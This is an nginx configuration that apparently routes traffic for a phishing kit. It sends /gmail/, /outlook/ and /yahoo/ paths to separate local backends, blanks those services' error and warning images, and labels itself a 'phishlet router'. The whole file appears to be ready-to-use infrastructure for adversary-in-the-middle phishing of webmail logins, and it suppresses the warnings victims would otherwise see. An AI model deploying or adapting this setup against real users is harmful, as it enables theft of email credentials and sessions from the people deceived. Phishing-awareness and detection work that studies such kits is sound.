server {
    listen 80;
    server_name _;

    location ~ ^/(gmail|outlook|yahoo)/app/images/(error|warning)\.svg$ {
        default_type image/svg+xml;
        return 204;
    }

    location ~ ^/(gmail|outlook|yahoo)/logo-safari\.png$ {
        default_type image/png;
        return 204;
    }

    location /gmail/ {
        proxy_pass http://host.docker.internal:5801/;
        proxy_http_version 1.1;
        proxy_read_timeout 300s;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection "upgrade";
    }

    location /outlook/ {
        proxy_pass http://host.docker.internal:5802/;
        proxy_http_version 1.1;
        proxy_read_timeout 300s;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection "upgrade";
    }

    location /yahoo/ {
        proxy_pass http://host.docker.internal:5803/;
        proxy_http_version 1.1;
        proxy_read_timeout 300s;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection "upgrade";
    }

    location / {
        return 404 "phishlet router";
    }
}
